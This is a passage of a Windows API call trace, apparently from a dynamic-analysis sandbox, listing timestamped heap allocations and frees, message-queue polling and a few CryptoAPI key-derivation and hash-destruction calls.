[0257.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0257.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0257.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0257.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0257.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0257.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0257.878] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87350, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87410) returned 1 [0257.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0257.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0257.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0257.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0257.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0257.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0257.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0257.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0257.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0257.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0257.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0257.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0257.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0257.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0257.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0257.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0257.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0257.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0257.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0257.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0257.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0257.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0257.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0257.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0257.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0257.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0257.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0257.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0257.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0257.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0257.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0257.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0257.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0257.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0257.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0257.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0257.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0257.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0257.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0257.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0257.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0257.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0257.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0257.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0257.882] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0257.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0257.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0257.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0257.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0257.882] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.882] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0257.882] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0257.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0257.883] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0257.883] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0257.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0257.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0257.883] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0257.883] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0257.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0257.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0257.883] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0257.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0257.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0257.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0257.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0257.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69ac8 [0257.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69ac8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0257.884] CryptDestroyHash (hHash=0xa87350) returned 1 [0257.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0257.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0257.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0257.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0257.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0257.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0257.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0257.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0257.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0257.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0257.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0257.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0257.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0257.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0257.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0257.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0257.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0257.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0257.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0257.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0257.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0257.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0257.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0257.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0257.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0257.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0257.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0257.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0257.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0257.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0257.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0257.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0257.887] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0257.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0257.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0257.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0257.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0257.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0257.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0257.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0257.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0257.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0257.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0257.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0257.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0257.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0257.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0257.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0257.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0257.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0257.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0257.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0257.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0257.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) 